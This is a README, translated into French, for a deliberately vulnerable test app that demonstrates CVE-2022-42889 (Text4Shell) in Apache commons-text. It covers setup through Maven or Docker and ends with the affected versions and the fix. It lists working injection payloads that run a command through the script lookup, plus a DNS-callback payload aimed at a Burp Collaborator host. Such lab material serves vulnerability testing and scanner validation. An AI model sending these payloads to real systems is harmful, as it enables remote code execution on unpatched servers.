
Application de preuve de concept pour le test de CVE-2022-42889
Ceci est une application vulnérable développée comme Preuve de Concept pour la vulnérabilité CVE-2022-42889.
Pour exécuter cela, vous aurez besoin de :
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
mvn clean install
Cela créera le dossier ./target et dans ce dossier se trouvera le fichier JAR text4shell-poc-0.0.1-SNAPSHOT.jar
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
Cela démarrera un serveur web sur votre localhost écoutant sur le port par défaut
8080Accédez au serveur web à l'adresse http://localhost:8080/ et vous devriez voir le résultat suivant
Text4Shell POC Test -@securekomodo
Envoyez des payloads à /reflected?poc=yourpayload
OU Envoyez des payloads à /blind avec le payload comme userAgent
Exemples de payloads d'exploit
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}
Encodeur URL recommandé pour une démonstration d'exploit réussie : https://www.urlencoder.org/.
Vous pouvez également utiliser Docker pour exécuter ce PoC :
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
docker build --tag=text4shell-poc .
docker run -p 80:8080 text4shell-poc
http://localhost/
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}
Encodeur URL recommandé pour une démonstration d'exploit réussie : https://www.urlencoder.org/.
Alternativement, vous pouvez valider l'efficacité d'outils de scan comme text4shell-scan
Pour que votre code soit vulnérable, vous devez :
commons-text de la version 1.5.0 jusqu'à (et non incluse) 1.10.0Le correctif consiste à mettre à jour vos instances de commons-text vers les versions 1.10.0 ou ultérieures.
Bryan Smith